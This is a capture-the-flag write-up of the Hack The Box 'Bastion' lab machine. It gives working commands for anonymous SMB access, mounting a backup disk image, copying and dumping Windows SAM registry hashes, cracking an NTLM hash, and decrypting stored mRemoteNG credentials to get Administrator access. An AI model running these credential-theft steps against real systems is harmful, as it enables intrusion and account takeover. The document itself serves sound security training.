Bastion

December 30, 2025

Union

Created by	Page	Difficulty	OS
L4mpje	Hack The Box	Easy	Windows

Enumeration

The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.

  nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.134 -oG scan
  /opt/extractports scan
  nmap -p22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 -Pn -sCV 10.10.10.134 -oN ports

SMB

SMB was exposed, so I enumerated available shares using anonymous access
```
  smbmap -H 10.10.10.134 -u 'guest'
```
I discovered a share named Backups with read and write permissions.

Due to a note warning that downloading all files could impact VPN stability, I decided to mount the share locally:

  mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
  # alternatively 
  mount //10.10.10.134/Backups smbShares/   

Inside the share, I identified two .vhd disk image files. The first one only contained boot files, so I focused on mounting the second image.

Offline Credential Extraction

To mount the VHD file, I used qemu-nbd:

  modprobe nbd
  ls /dev
	
  qemu-nbd --read-only -c /dev/nbd0 \
  'smbShares/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd'
	
  mkdir /mnt/HDD
  mount /dev/nbd0p1 /mnt/HDD

The mounted filesystem belonged to a Windows installation. I copied the registry hive files required to extract credentials:
```
 cd /mnt/HDD/Windows/System32/config
 cp SAM SYSTEM SECURITY /tmp
```

Using Impacket, I dumped the local account hashes

  impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

This yielded the NTLM hash for the user L4mpje. I verified that the hash was valid:

  netexec smb 10.10.10.134 -u L4mpje -H "aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9"

I then cracked the hash using hashcat:

  hashcat -m 1000 26112010952d963c8dc4217daec986d9 /usr/share/wordlists/rockyou.txt

With the recovered credentials and knowing that SSH was available, I authenticated to the system
```
  ssh L4mpje@10.10.10.134
```
This allowed me to retrieve the user flag

Privilege Escalation

While enumerating installed applications, I discovered mRemoteNG on the system.

I located its configuration directory:

  C:\Users\L4mpje\appdata\Roaming\mRemoteNG encuentro el fichero confCons.xml

Within this directory, I found the file confCons.xml. Checking the changelog confirmed the version 1.76.11, which stores encrypted credentials using a reversible algorithm
I used a public decryption tool to recover stored credentials
```
  python3 mremoteng_decrypt.py confCons.xml
```
This revealed the Administrator password in clear text. Using these credentials, I connected via SSH
```
  ssh Administrator@10.10.10.134
```
As Administrator, I was able to retrieve the root flag